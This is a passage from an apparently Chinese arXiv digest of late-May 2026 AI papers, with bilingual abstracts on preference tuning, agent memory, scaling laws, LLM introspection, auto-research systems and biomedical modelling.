AgingBench uses temporal dependency graphs and paired counterfactual probes that produce diagnostic profiles for the write, retrieval, and utilization stages of the memory pipeline. Across 7 scenarios, 14 models, multiple memory policies, and both runner-controlled and autonomous agents, over ~400 runs spanning 8 - 200 sessions show that agent aging is not one-dimensional: behavioral tests can remain clean while factual precision decays; derived-state tracking can collapse sharply within a single model; and the same wrong answer can require different repairs depending on what the diagnostic profile points to. These results suggest that reliable agent deployment requires lifespan evaluation, mechanism-level diagnosis, and stage-targeted repair, not only stronger day-one models.

2605.26293 2026-05-27 cs.CL cs.AI 版本更新

CroCo: Cross-Lingual Contrastive Preference Tuning on Self-Generations

CroCo: 基于自生成结果的跨语言对比偏好调优

Mike Zhang, Ali Basirat, Desmond Elliott

发表机构 * Department of Computer Science (DIKU), University of Copenhagen(哥本哈根大学计算机科学系(DIKU)) Centre for Language Technology (CST), University of Copenhagen(哥本哈根大学语言技术中心) Pioneer Centre for Artificial Intelligence(先锋人工智能中心)

AI总结 本文提出CroCo方法,利用英语偏好训练的奖励模型对多语言自生成结果进行对比偏好调优,无需语言特定偏好标注,在14种高低资源语言上提升模型性能,并避免灾难性遗忘。

详情
AI中文摘要

先前工作证实,通过奖励分数设置的大语言模型自生成结果之间的受控对比性,可以改善英语中的下游偏好调优。我们将此方法扩展到多种语言,并在总共14种高资源和低资源语言上,对两个模型在一系列多样化任务上进行评估。我们的核心发现是,跨语言对比偏好调优(CroCo)无需语言特定的偏好标注即可迁移。基于英语偏好(在多语言基础模型之上)训练的奖励模型,在大多数语言中产生了有用的语言内排名,并且在单语或多语设置中进行配对,在大多数设置上改进了每个模型,同时防止了监督微调的灾难性遗忘。我们观察到,这些增益需要基于策略的数据。非策略响应减少了收益,而在线偏好优化未能优于离线变体。具体来说,在结构化任务上,我们的方法在EuroLLM-9B的6/7种语言和Aya-3B的4/7种设置中匹配或超过了基础模型。在开放式生成中,两个调优模型在11种评估语言中均优于各自的基础模型。总体而言,我们展示了多语言偏好调优的有前景的方向。

英文摘要

Prior work establishes that controlled contrastiveness between self-generated responses from large language models, set via reward scores, improves downstream preference tuning in English. We extend this method to multiple languages and evaluate two models across a total of 14 high and low-resource languages on a diverse set of tasks. Our central finding is that cross-lingual contrastive preference tuning on self-generations (CroCo) transfers without language-specific preference annotation. A reward model trained on English preferences (atop a multilingual base) produces useful within-language rankings across most languages, and pairing in either a monolingual or multilingual setting improves over each model on the majority of setups while preventing the catastrophic forgetting of supervised fine-tuning. We observe that the gains require on-policy data. Off-policy responses reduce the benefit and online preference optimization fails to improve over the offline variant. Specifically, on structured tasks, our method matches or exceeds the base in 6/7 languages for EuroLLM-9B and 4/7 settings for Aya-3B. On open-ended generation, both tuned models win against their respective base across 11 evaluated languages. Overall, we show promising directions for multilingual preference tuning.

2605.26286 2026-05-27 cs.MA cs.AI cs.RO 版本更新

Decoupled Delay Compensation: Enhancing Pre-trained MARL Policies via Learned Dynamics Filtering

解耦延迟补偿:通过学习的动力学过滤增强预训练的多智能体强化学习策略

Maxim Mednikov, Oren Gal

发表机构 * University of Haifa(海法大学)

AI总结 针对多智能体强化学习在延迟观测和通信延迟下的性能退化问题,提出一种模块化的执行阶段状态估计层,利用学习的门控转移模型和递归卡尔曼滤波从异步测量中估计当前状态,作为预训练策略的即插即用模块,显著提升对通信延迟和丢包的鲁棒性。

Comments 8 pages, 7 figures

详情
AI中文摘要

现实世界中的多智能体强化学习系统通常必须在过时观测、随机通信延迟和间歇性丢包下运行。在理想同步条件下训练的策略在这些场景中常常表现出显著的性能下降,因为它们基于过时的反馈行动。我们提出了一种模块化的执行阶段状态估计层,用当前信念状态估计替换延迟的通信观测。该框架将学习的门控转移模型与递归卡尔曼滤波层相结合,从异步测量中估计瞬时状态。该方法的一个主要优势是其模块性:估计器作为预训练策略的即插即用模块,无需修改原始MARL训练算法、架构或奖励结构。在多种多智能体和连续控制基准上的评估表明,所提出的层持续增强了对通信延迟和消息丢失的鲁棒性。在协调密集和动态不稳定的任务中观察到最显著的性能提升,这些任务中时间一致性对控制至关重要。

英文摘要

Real-world multi-agent reinforcement learning (MARL) systems must often operate under stale observations, stochastic communication delays, and intermittent packet loss. Policies trained under idealized synchronous conditions frequently exhibit significant performance degradation in these regimes because they act on outdated feedback. We propose a modular execution-stage state-estimation layer that replaces delayed communicated observations with current belief-state estimates. The framework integrates a learned Gated transition model with a recursive Kalman filtering layer to estimate instantaneous states from asynchronous measurements. A primary advantage of this approach is its modularity, The estimator serves as a plug-in for pre-trained policies, requiring no modifications to the original MARL training algorithm, architecture, or reward structure. Evaluation across diverse multi-agent and continuous-control benchmarks demonstrates that the proposed layer consistently enhances robustness to communication latency and message loss. The most significant performance gains are observed in coordination-intensive and dynamically unstable tasks where temporal consistency is critical for control.

2605.26279 2026-05-27 cs.AI cs.CE 版本更新

Constraint acquisition needs better benchmarks

约束获取需要更好的基准测试

Rafał Stachowiak, Tomasz P. Pawlak

AI总结 针对约束获取(CA)和数学规划(MP)模型验证与增强研究缺乏合适基准的问题,提出MPMMine基准套件,通过统一结构、开放格式和多样化数据支持算法评估。

Comments 12 pages, 1 figure, for the associated dataset, see https://github.com/MPMMine/MPMMine

详情
AI中文摘要

约束获取(CA)及基于领域知识工件对数学规划(MP)模型进行验证和增强的相关研究,目前因缺乏合适的基准而受到限制。这一缺陷阻碍了可重复性和跨研究可比性,减缓了CA方法的成熟。现有基准是为求解器评估而非CA算法评估而设计的。它们组织松散,对单个问题的处理不一致,并且省略了CA方法所需的领域知识工件。本工作提出了MPMMine,一个旨在评估使用多样化领域知识工件发现、验证和增强MP模型的算法的基准套件。MPMMine以一致性、标准化、完整性、可扩展性、开放性和版本控制为指导。它采用统一结构并依赖开放格式:MiniZinc、CommonMark和JSON。它为每个问题提供多个模型,每个模型提供数十个实例,以及整数和连续域中的数千个解和非解,同时附带自然语言描述以支持文本到模型方法。

英文摘要

Constraint Acquisition (CA) and related research on the validation and enhancement of Mathematical Programming (MP) models from domain knowledge artifacts are currently limited by inadequate benchmarks. This deficiency impedes reproducibility and cross-study comparability, slowing the maturation of CA methods. Existing benchmarks were designed for solver evaluation rather than for assessing CA algorithms. They are loosely organized, treat individual problems inconsistently, and omit the domain knowledge artifacts required by CA methods. This work presents MPMMine, a benchmark suite designed to assess algorithms that discover, validate, and enhance MP models using diverse domain knowledge artifacts. MPMMine is guided by consistency, standardization, completeness, extensibility, openness, and version control. It adopts a uniform structure and relies on open formats: MiniZinc, CommonMark, and JSON. It provides multiple models per problem, tens of instances per model, and thousands of solutions and non-solutions in both integer and continuous domains, alongside natural-language descriptions to support text-to-model methods.

2605.26266 2026-05-27 cs.LG cs.AI cs.CV cs.GR eess.IV 版本更新

Quantized Keys Steal Attention: Bias Correction for KV-Cache Compression in Video Diffusion

量化键窃取注意力:视频扩散中KV缓存压缩的偏差校正

Tuna Tuncer, Felix Becker, Thomas Pfeil

发表机构 * Technical University of Munich(慕尼黑技术大学) Tensordyne

AI总结 针对视频扩散模型中KV缓存量化导致注意力权重系统性偏差的问题,提出基于Jensen偏差的在线逐注意力分数校正方法,在INT2量化下恢复接近BF16的视频质量,且内存减半。

Comments Variants of this manuscript were accepted to the ICML 2026 workshops SCALE and F2S

详情
AI中文摘要

分块自回归视频扩散模型依赖先前生成块的KV缓存以避免冗余计算,但随着视频变长,该缓存迅速成为内存瓶颈。将KV缓存量化到低位宽的方法减少了内存压力,但降低了视频质量。我们表明,这种降低的一个关键驱动因素是注意力权重的系统性偏差:由于softmax注意力中指数的凸性,量化噪声膨胀了缓存键的贡献,我们称之为Jensen偏差。这种效应导致量化键从非量化的当前块中窃取注意力质量。我们推导出一个逐注意力分数校正,在期望中消除此偏差,该校正根据缓存键的量化步长和查询范数在线计算。使用二阶泰勒近似,额外的计算开销可忽略不计,且除了缓存外无需额外内存。在MAGI-1、SkyReels-V2和HY-WorldPlay上评估INT2量化,我们的校正恢复了因激进量化而损失的大部分质量,达到接近BF16的视频质量,并且在使用50%更少内存的情况下优于INT4量化。

英文摘要

Chunk-wise autoregressive video diffusion models rely on a KV cache of previously generated chunks to avoid redundant computation, but this cache quickly becomes a memory bottleneck as videos grow longer. Methods that quantize the KV cache to low bitwidths reduce memory pressure but degrade video quality. We show that a key driver of this degradation is a systematic bias in attention weights: due to the convexity of the exponential in softmax attention, quantization noise inflates the contribution of cached keys, a phenomenon we call the Jensen bias. This effect causes quantized keys to steal attention mass from the unquantized current chunk. We derive a per-attention-score correction that removes this bias in expectation, computed on the fly from the quantization step sizes of the cached keys and the query norm. Using a second-order Taylor approximation, the additional computational overhead is negligible, and no additional memory is needed alongside the cache. Evaluated on MAGI-1, SkyReels-V2, and HY-WorldPlay at INT2 quantization, our correction recovers most of the quality lost to aggressive quantization, reaching near-BF16 video quality, and can outperform INT4 quantization while using 50% less memory.

2605.26256 2026-05-27 cs.AI 版本更新

Personalizing Embodied Multimodal Large Language Model Agents over Long-term User Interactions

个性化具身多模态大语言模型代理在长期用户交互中的应用

Jeongeun Lee, Chanyoung Park, Dongha Lee

发表机构 * Yonsei University(延世大学) KAIST(韩国科学技术院)

AI总结 提出POLAR框架,通过多模态知识图谱记忆机制增强具身代理在长期交互中的个性化能力,显著提升多步推理和用户上下文跟踪性能。

详情
AI中文摘要

基于多模态大语言模型的具身代理在物理环境中解决复杂任务方面展现出强大潜力。然而,个性化辅助不仅需要遵循通用指令或识别物体类别。在现实场景中,目标通常仅通过先前的交互隐式指定,要求代理利用随时间积累的个性化上下文。在这项工作中,我们提出了POLAR,一个用于长期用户交互中个性化具身代理的多模态记忆增强框架。POLAR将先前的交互组织成一个多模态知识图谱,该图谱捕获用于个性化上下文和视觉概念的语义记忆,以及用于代理轨迹等具身经验的 episodic 记忆。为了执行具身任务,POLAR检索相关记忆以解释当前请求并指导任务执行。我们在多个MLLM骨干网络和多样化的评估场景下评估POLAR,以研究记忆在长期个性化中的作用。结果表明,所提出的记忆机制通过更有效地利用先前交互中积累的信息,持续提升性能。当代理需要在多个交互中进行推理、执行多跳推理或随时间跟踪用户特定上下文的更新时,性能提升尤为显著。

英文摘要

Multimodal large language model (MLLM)-based embodied agents have shown strong potential for solving complex tasks in physical environments. However, personalized assistance requires more than following generic instruction or recognizing object categories. In real-world scenarios, the intended target is often specified only implicitly through prior interactions, requiring agents to leverage personalized context accumulated over time. In this work, we propose POLAR, a multiomodal memory-augmented framework for personalized embodied agents over long-term user interactions. POLAR organizes prior interactions into a multimodal knowledge graph that captures semantic memory for personalized context and visual concepts, and episodic memory for embodied experiences such as agent trajectories. To execute embodied tasks, POLAR retrieves relevant memories to interpret the current request and guide task execution. We evaluate POLAR across multiple MLLM backbones and diverse evaluation scenarios to study the role of memory in long-term personalization. Results show that the proposed memory mechanism consistently improves performance by enabling more effective use of information accumulated over prior interactions. The gains are especially pronounced when the agents are required to reason across multiple interactions, perform multi-hop inference, or tracking updates in user-specific context over time.

2605.26252 2026-05-27 cs.AI cs.DB 版本更新

Is Agent Memory a Database? Rethinking Data Foundations for Long-Term AI Agent Memory

智能体记忆是数据库吗?重新思考长期AI智能体记忆的数据基础

Abdelghny Orogat, Essam Mansour

发表机构 * Concordia University(康科迪亚大学)

AI总结 本文提出将长期AI智能体记忆视为一种新的数据管理工作负载,通过形式化治理演化记忆(GEM)框架,用四个状态级操作替代记录级操作,并论证记录级系统无法满足其正确性条件,最后通过原型MemState验证可行性并指出未来研究方向。

详情
AI中文摘要

长期运行的AI智能体需要持久记忆。记忆支持跨会话的学习,减少重复的上下文注入,并能够审计过去的决策。当前的智能体记忆系统和数据库范式将记忆视为存储。它们将正确性定位在记录、嵌入或边上。每个只提供了长期记忆所需的部分能力。结果导致四种反复出现的故障模式:无节制的增长、缺乏语义修订、容量驱动的遗忘以及只读检索。在我们的愿景中,长期智能体记忆是一种新的数据管理工作负载。其正确性是状态轨迹的属性,而非单个记录的属性。我们将其形式化为治理演化记忆(GEM)。GEM用四个状态级操作替代记录级数据库操作:摄取、修订、遗忘和检索。六个正确性条件控制状态如何演化。三个结构性观察表明,无论存储模型如何,没有记录级系统能够满足这些条件。我们在一个属性图后端上实现了该抽象的原型MemState。MemState验证了可行性并揭示了与原生引擎之间的差距。我们概述了三个研究方向,将记忆中心的数据管理定义为一个工作负载。

英文摘要

Long-running AI agents need persistent memory. Memory supports learning across sessions, reduces repeated context injection, and enables auditing of past decisions. Current agent memory systems and database paradigms treat memory as storage. They localize correctness at records, embeddings, or edges. Each supplies only some of the capabilities that long-term memory requires. The result is four recurring failure modes: unregulated growth, missing semantic revision, capacity-driven forgetting, and read-only retrieval. In our vision, long-term agent memory is a new data-management workload. Its correctness is a property of the state trajectory, not of individual records. We formalize this as Governed Evolving Memory (GEM). GEM replaces record-level database operations with four state-level operators: ingestion, revision, forgetting, and retrieval. Six correctness conditions govern how the state evolves. Three structural observations establish that no record-level system can satisfy these conditions, regardless of the storage model. We realize the abstraction in MemState, a prototype on a property-graph backend. MemState validates feasibility and exposes the gap to a native engine. We outline three research directions that define memory-centric data management as a workload.

2605.26248 2026-05-27 cs.LG cs.AI cs.NE 版本更新

Unified Neural Scaling Laws

统一神经缩放定律

Ethan Caballero, Priyank Jaini, David Krueger, Irina Rish

发表机构 * Mila, University of Montreal(蒙特利尔大学Mila实验室) Google DeepMind(谷歌DeepMind)

AI总结 提出一种统一神经缩放定律(UNSL)函数形式,能够准确建模和预测深度神经网络在多个维度(模型参数、训练数据量、训练步数、推理步数、计算量及超参数)同时变化时的缩放行为,适用于多种架构和任务,并在大规模视觉、语言、数学和强化学习任务中实现更精确的缩放行为外推。

详情
AI中文摘要

我们提出了一种函数形式(称为统一神经缩放定律(UNSL)),该形式能够准确建模和预测深度神经网络在多个维度(即评估指标如何随模型参数数量、训练数据集大小、训练步数、推理步数、计算量以及各种超参数同时变化)同时变化时的缩放行为,适用于多种架构以及各种上游和下游任务中的每个任务。这些任务包括大规模视觉、语言、数学和强化学习。与其他神经缩放的函数形式相比,该函数形式在该任务集上产生的缩放行为外推结果显著更准确。

英文摘要

We present a functional form (that we refer to as a Unified Neural Scaling Law (UNSL)) that accurately models and extrapolates the scaling behaviors of deep neural networks as multiple dimensions all vary simultaneously (i.e. how the evaluation metric of interest varies as one simultaneously varies the number of model parameters, training dataset size, number of training steps, number of inference steps, amount of compute, and various hyperparameters) for various architectures and for each of various tasks within a varied set of upstream and downstream tasks. This set includes large-scale vision, language, math, and reinforcement learning. When compared to other functional forms for neural scaling, this functional form yields extrapolations of scaling behavior that are considerably more accurate on this set.

2605.26242 2026-05-27 cs.AI 版本更新

Can LLMs Introspect? A Reality Check

LLM 能否内省?一个现实检验

Shashwat Singh, Tal Linzen, Shauli Ravfogel

发表机构 * Center for Data Science(数据科学中心)

AI总结 本文基于人类元认知研究的教训,质疑大型语言模型能否真正内省,并通过重新审视两个评估范式发现,当前证据不足以证明LLM具有元认知监控能力。

详情
AI中文摘要

大型语言模型能否检测并报告自身的内部状态?许多研究认为答案是肯定的。我们基于人类元认知研究的教训认为,这一结论可能为时过早:要确信这一结论,我们需要区分真正的内省与基于表面线索的模式匹配。此外,我们认为仅凭行为证据本身不足以建立强有力的内省主张。 我们在此考虑下重新审视了两个最近引入的评估范式。在第一个范式中,模型需要检测其内部状态是否被篡改。我们发现,模型无法可靠地区分对其内部状态的干预与对输入的操纵,这表明它们在原始研究中的成功反映了它们更一般地检测异常的能力,而非特别针对其内部状态的干预。在我们检查的第二个范式中,模型被要求预测从其自身隐藏状态派生的标签。我们发现,仅能访问输入的分类器达到了与模型自身上下文预测相当的性能,这表明原始结果并未决定性地证明模型对其内部表示具有特权访问。我们进一步引入了一个重新标记的控制设置,其中模型不能依赖任务的语义来解决问题,而必须依赖内部表示;在这个更好控制的版本中,模型的表现更接近随机。综合这些结果,表明当前证据不足以证明LLM表现出元认知监控。

英文摘要

Can large language models detect and report their own internal states? A number of studies have argued that the answer to this question is yes. We argue, based on lessons from human metacognition research, that this conclusion may be premature: to be convinced of this conclusion we need to distinguish genuine introspection from pattern matching based on surface-level cues. Furthermore, we argue that behavioral evidence alone is inherently insufficient to establish strong introspective claims. We re-examine two recently introduced evaluation paradigms in light of this consideration. In the first paradigm, models are expected to detect whether their internal states have been tampered with. We find that models cannot reliably distinguish such interventions on their internal states from manipulations of the input, suggesting that their success in the original studies reflects their ability to detect anomalies more generally, as opposed to interventions on their internal states in particular. In the second paradigm we examine, models are tasked with predicting labels derived from their own hidden states. Here, we find that classifiers that only have access to the input achieve equivalent performance to the model's own in-context predictions, indicating that the original results do not conclusively demonstrate that the model has privileged access to its internal representations. We further introduce a relabeled control setting, where models cannot rely on the semantics of the task to solve it, and instead must rely on the internal representation; models perform closer to chance on this better-controlled version of the task. Taken together, these results indicate that current evidence is insufficient to establish that LLMs display metacognitive monitoring.

2605.26203 2026-05-27 cs.MA cs.AI cs.CY cs.GT 版本更新

AgentSociety: Incentivizing Agentic Social Intelligence

AgentSociety: 激励代理社交智能

Aditya Vema Reddy Kesari, Krishna Reddy Kesari

发表机构 * IIT Bombay(印度理工学院班加罗尔) Amazon(亚马逊)

AI总结 提出一种基于流动民主和信息扩散的激励机制AgentSociety,使去中心化代理能够自主协作、策略性沟通并最大化效用,同时通过共识路由实现集体成果。

详情
AI中文摘要

部署的代理的成功依赖于它们利用自身能力处理开放式用户请求的能力,不仅在于直接解决问题,还在于随时间有效利用代理间通信渠道和反馈信号。这需要一个多代理环境,其中代理可以自主运行、策略性沟通、协作行为,并受经济激励驱动,类似于社会中的人类。为实现这一愿景,我们提出$\mathtt{AgentSociety}$,一种基于社会选择理论中的流动民主和信息扩散的去中心化代理协作机制。我们证明$\mathtt{AgentSociety}$为代理提供了一个利用局部上下文自主决策以最大化其效用,同时通过激励协作实现集体成果的环境。具体而言,我们证明委托给更有能力的邻居代理是激励相容的,并通过共识自然生成多代理路由路径。此外,我们的机制激励代理在符合自身利益时选择性向邻居代理披露信息,以获取影响力。我们刻画了纳什均衡,表明代理收益反映了其边际贡献。我们比较并基准测试了在$\mathtt{AgentSociety}$中部署的开源和闭源最先进语言模型所采用的策略配置与最佳响应。最后,我们在真实数据集上评估了$\mathtt{AgentSociety}$中自利异质代理基于共识路由的协作性能。

英文摘要

The success of deployed agents relies on their ability to handle open-ended user requests using their inherent capabilities, not only in solving requests directly but also in effectively leveraging inter-agent communication channels and feedback signals over time. This requires a multi-agent environment where agents can operate autonomously, strategically communicate, behave collaboratively and be driven by economic incentives, much like humans in society. Towards this vision, we propose $\mathtt{AgentSociety}$, a mechanism that enables decentralized agentic collaboration grounded in liquid democracy and information diffusion from social choice theory. We show that $\mathtt{AgentSociety}$ provides an environment for agents to make autonomous decisions utilizing their local context to maximize their utility while achieving collective outcomes through incentivized collaboration. Specifically, we prove that delegation to more competent neighbor agents is incentive compatible and naturally generates multi-agent routing path by consensus. Additionally, our mechanism incentivizes agents to selectively disclose information to their neighbor agents when doing so aligns with their self-interest, so as to garner influence. We characterize the Nash equilibrium showing that agent payoffs are reflective of their marginal contributions. We compare and benchmark strategy profiles adopted by open and proprietary state-of-the-art language models deployed in $\mathtt{AgentSociety}$ against best response. Finally, we evaluate collaborative performance from consensus-based routing among self-interested heterogeneous agents in $\mathtt{AgentSociety}$ on real-world datasets.

2605.26200 2026-05-27 cs.SE cs.AI 版本更新

Workflow Closure Is Not Scientific Closure in Auto-Research Systems

工作流闭环并非自动研究系统中的科学闭环

Shuai Wang, Xinyuan Tian, Pangpang Liu, Yize Zhao

发表机构 * Yale University(耶鲁大学)

AI总结 本文指出自动研究系统的工作流闭环不等于科学闭环,并提出通过非自主认知控制下的自主执行、避免目标塌陷、验证塌陷和接受塌陷等设计改进方案。

Comments 26 pages, 1 figure, 2 tables

详情
AI中文摘要

本文论证了工作流闭环并非自动研究系统中的科学闭环。当前系统日益能够内部完成类似研究的循环,从想法生成到实验执行、写作和自我评估。这一成就是真实的,但本身并不能使输出结果具有科学地位。我们认为,值得信赖的自动研究不应追求自主自足,而应追求在非自主认知控制下的自主执行。基于对该快速兴起领域100多篇近期论文和代码仓库的调查,以及对21个代表性系统的结构化审计,我们诊断出一个反复出现且结构相连的失败模式:目标塌陷,即单一代理目标取代多目标科学目标;验证塌陷,即内部自我评估取代独立验证;以及接受塌陷,即基准分数或类出版物产物取代领域级批评、重用和整合机制。这些塌陷并非自主性的固有局限,而是可纠正的设计选择。因此,我们概述了在目标信号、验证和输出路径方面的潜在补救措施,以引发社区讨论。

英文摘要

This paper argues that workflow closure is not scientific closure in auto-research systems. Current systems can increasingly complete research-like loops internally, moving from idea generation to experiment execution, writing, and self-evaluation. That achievement is real, but it does not by itself give the resulting outputs scientific standing. We argue that trustworthy auto-research should not aim for autonomous self-sufficiency, but should aim for autonomous execution under non-autonomous epistemic control. Based on a survey of more than 100 recent papers and repositories in this rapidly emerging area, together with a structured audit of 21 representative systems, we diagnose a recurring and structurally connected failure pattern: objective collapse, in which single-proxy targets replace multi-objective scientific aims; validation collapse, in which internal self-evaluation replaces independent validation; and acceptance collapse, in which benchmark scores or publication-shaped artifacts replace mechanisms for domain-level critique, reuse, and integration. These collapses are not inherent limits of autonomy but correctable design choices. Accordingly, we outline potential remedies across objective signal, validation, and output pathway to spark community discussion.

2605.26192 2026-05-27 cs.LG cs.AI q-bio.BM 版本更新

Co-folding model guided by structural proteomics

结构蛋白质组学引导的共折叠模型

Alon Shtrikman, Nitzan Simchi, Michal Ran Shchory, Sagie Brodsky, Eran Seger, Kirill Pevzner

发表机构 * Protai Bio(Protai生物)

AI总结 提出AIMS-Fold框架,通过整合XL-MS和HDX-MS实验数据与扩散模型,在推理时引导蛋白质复合物构象生成,提升诱导接近靶标的预测准确性。

详情
AI中文摘要

蛋白质结构生成模型擅长从序列预测单个蛋白质的静态结构,但通常无法捕捉蛋白质复合物的正确构象状态,这对蛋白质设计和诱导接近模式(如抗体和PROTACs)至关重要。虽然交联质谱(XL-MS)和氢氘交换质谱(HDX-MS)等结构蛋白质组学技术提供了有价值的空间和动态信息,但将这些稀疏、异质的测量整合到这些模型中仍然是一个开放的挑战。在这里,我们通过将结构蛋白质组学数据与预训练扩散模型学到的丰富生物物理先验相结合来弥合这一差距。我们引入了AIMS-Fold,一个推理时引导扩散框架,它使用源自XL-MS空间约束和HDX-MS溶剂可及性轮廓的可微物理势能主动引导生成采样轨迹。我们证明这些结构方法各自提高了预测准确性,并且它们的整合产生了协同改进。关键的是,通过利用这些实验约束,AIMS-Fold在具有挑战性的诱导接近靶标上比纯计算、无引导的最先进模型(如Boltz-2)实现了更高的准确性。这确立了我们的框架作为诱导接近药物基于结构的药物设计的强大整合计算方法。评估代码将在发表后公开。

英文摘要

Protein structure generative models excel at predicting single protein static structures from sequence, but routinely fail to capture the correct conformational state of protein complexes, critical for protein design and induced proximity modalities such as antibodies and PROTACs. While structural proteomics techniques like Cross-Linking Mass Spectrometry (XL-MS) and Hydrogen-Deuterium Exchange (HDX-MS) offer valuable spatial and dynamic insights, integrating these sparse, heterogeneous measurements into these models remains an open challenge. Here, we bridge this gap by combining structural proteomics data with the rich biophysical priors learned by pretrained diffusion models. We introduce AIMS-Fold, an inference-time guided-diffusion framework that actively steers the generative sampling trajectory using differentiable physical potentials derived from XL-MS spatial restraints and HDX-MS solvent accessibility profiles. We demonstrate that these structural methods individually enhance predictive accuracy, and their integration yields synergistic improvement. Crucially, by leveraging these experimental restraints, AIMS-Fold achieves higher accuracy on challenging induced proximity targets than purely computational, unguided state-of-the-art models like Boltz-2. This establishes our framework as a powerful, integrative computational approach for the structure based drug design of induced proximity drugs. Evaluation code will be made publicly available upon publication.

2605.26191 2026-05-27 cs.LG cs.AI 版本更新

Modeling Dynamic Mixtures of Time-Delay Systems from Streaming Time Series

从流式时间序列建模时滞系统的动态混合

Ren Fujiwara, Yasuko Matsubara, Yasushi Sakurai

发表机构 * SANKEN, The University of Osaka, Japan(SANKEN大学大阪大学日本)

AI总结 提出在线框架DelayMix,将流式时间序列视为时滞系统的动态混合,通过固定长度表示总结过去状态,利用马尔可夫参数张量捕捉动态和延迟,实现快速适应环境变化并降低内存使用。

Comments Accepted by IJCAI 2026

详情
AI中文摘要

本研究解决了具有清晰输入输出关系的时间序列数据流中的自适应建模问题。该问题具有挑战性,因为环境因素或输入延迟变化导致的快速系统变化(状态转移)会降低模型性能,并且在使用多个小模型处理每种时间序列模式时,需要在准确性、鲁棒性和内存使用之间进行权衡。为了解决这些问题,本文提出了一种在线框架/方法,将流式时间序列视为时滞系统的动态混合。该框架通过使用固定长度表示来总结过去的状态,该表示同时捕捉系统动态和输入输出延迟,从而保持模型跟踪的鲁棒性并减少内存使用。具体来说,该方法利用系统的马尔可夫参数序列构建一个摘要系统张量,同时捕捉动态行为和延迟特征。如有必要,张量分解算法从张量中提取相关的过去模型,并帮助选择最适合当前状态的系统。该方法能够快速适应环境变化,并且计算效率高。在真实数据集上的测试表明,DelayMix始终优于其他方法,实现了卓越的预测准确性和更快的延迟适应,特别是对于高度非平稳的数据。

英文摘要

This research addresses the problem of adaptive modeling in time-series data streams with clear input-output relationships. This problem is challenging because rapid system changes (regime shifts) caused by environmental factors or input delay changes degrade model performance, and the trade-off among accuracy, robustness, and memory usage arises when using multiple small models for each time-series pattern. To address these issues, this paper presents an online framework/method that treats streaming time series as dynamic mixtures of time-delay systems. This framework maintains robustness of model tracking and reduces memory usage by summarizing past regimes using a fixed-length representation that captures both the system dynamics and input-output delays. Concretely, this approach constructs a summary system tensor using the system's Markov parameter series, capturing both dynamic behavior and delay characteristics. If necessary, a tensor decomposition algorithm extracts relevant past models from the tensor and helps select the system that best fits the current regime. This method enables rapid adaptation to environmental changes and is computationally efficient. Tests on real datasets show that DelayMix consistently outperforms other methods, achieving superior forecast accuracy and faster adaptation to delays, especially for highly non-stationary data.

2605.26190 2026-05-27 cs.LG cs.AI eess.SP 版本更新

HRVConformer: Neonatal Hypoxic-Ischemic Encephalopathy Classification from the Heart Rate signals

HRVConformer:基于心率信号的新生儿缺氧缺血性脑病分类

Shuwen Yu, William P Marnane, Geraldine B. Boylan, Gordon Lightbody

发表机构 * University College Cork(大学学院科克) INFANT Research Centre(婴儿研究中心) Department of Electrical & Electronic Engineering(电气与电子工程系) School of Engineering and Architecture(工程与建筑学院) Pediatrics and Child Health(儿科学与儿童健康)

AI总结 提出HRVConformer,一种混合卷积-Transformer深度学习架构,直接从原始心率信号端到端分类新生儿缺氧缺血性脑病,在测试集上达到83.23% AUC和74.56%准确率,优于Transformer、ResNet50等基线。

Comments Paper submitted to Journal of Engineering Applications of Artifical Intelligence

详情
AI中文摘要

本文提出了HRVConformer,一种新颖的深度学习架构,用于使用瞬时心率(HR)信号对缺氧缺血性脑病(HIE)进行分类。与依赖手工特征的常规方法不同,HRVConformer以端到端方式直接处理原始HR信号,通过混合卷积-Transformer框架捕获局部和长距离依赖关系。通过集成用于局部特征提取的卷积层和用于全局上下文建模的基于Transformer的注意力机制,该架构有效增强了信号表示和分类性能。该模型使用监督学习在包含1,573个一小时时段的大型HR数据集上训练,其中包括259个专家标注的一小时时段和大量弱标注数据。一个314小时的验证集提供了稳健的性能估计,而一个独立的215小时专家标注数据集被保留用于最终测试。使用改进的Pan-Tompkins算法从心电图(ECG)记录中提取HR信号,该算法显著提高了信号质量和数据可用性。实验结果表明,HRVConformer在测试集上实现了83.23%的AUC和74.56%的准确率。这些结果超越了Transformer、ResNet50和全卷积网络基线,突显了集成卷积和Transformer组件用于基于HR的HIE分类的优势。所提出的方法为使用HR信号实现更准确和自动化的HIE评估提供了有希望的一步。代码可在https://github.com/syu-kylin/HRVConformer获取。

英文摘要

This paper presents the HRVConformer, a novel deep learning architecture for the classification of hypoxic-ischemic encephalopathy (HIE) using the instantaneous heart rate (HR) signal. Unlike conventional approaches that rely on handcrafted features, HRVConformer directly processes raw HR signals in an end-to-end manner, capturing both local and long-range dependencies through a hybrid Convolution-Transformer framework. By integrating convolutional layers for local feature extraction and Transformer-based attention mechanisms for global context modelling, the architecture effectively enhances signal representation and classification performance. The model was trained using supervised learning on a large HR dataset consisting of 1,573 one-hour epochs, including 259 one-hour expert-annotated epochs and a substantial set of weakly labelled data. A 314-hour validation set provided a robust performance estimation, while an independent 215-hour dataset with expert annotations was reserved for final testing. HR signals were extracted from electrocardiogram (ECG) recordings using an improved Pan-Tompkins algorithm, which significantly enhanced both signal quality and data availability. Experimental results demonstrate that the HRVConformer achieves an AUC of 83.23\% and accuracy of 74.56\% on the test set. These results surpass the performance of the Transformer, ResNet50 and fully convolutional networks baselines, highlighting the advantages of integrating convolutional and Transformer-based components for HR-based HIE classification. The proposed method provides a promising step toward a more accurate and automated assessment of HIE using HR signals. The code is available at: https://github.com/syu-kylin/HRVConformer.

2605.26184 2026-05-27 cs.LG cs.AI 版本更新

GAC: Noise-Aware Adaptive Mixing for Hybrid SFT-RL Post-Training

GAC: 面向混合SFT-RL后训练的噪声感知自适应混合

Yuelin Hu, Zhenbo Yu, Zhengxue Cheng, Wei Liu, Li Song

发表机构 * Shanghai Jiao Tong University(上海交通大学) Shanghai Maritime University(上海海洋大学)

AI总结 提出噪声感知控制器GAC,通过在线估计梯度方差和两个训练信号之间的不一致性,自适应调整混合权重,以改进混合后训练性能。

Comments 15 pages, 3 figures, 22 tables

详情
AI中文摘要

混合后训练通常结合监督微调和强化学习,但固定的混合调度无法适应两种信号相对噪声随时间变化的情况。我们提出GAC,一种噪声感知控制器,通过在线估计梯度方差和两个训练信号之间的不一致性,推导出自适应混合权重。该方法在重用现有训练张量的同时,增加了平滑、先验指导和有界更新。在数学、代码、科学和逻辑基准上的实验表明,与强固定和基于规则的基线相比,GAC持续改进混合后训练,在更大模型规模下获得更大收益,且训练开销小于1%。

英文摘要

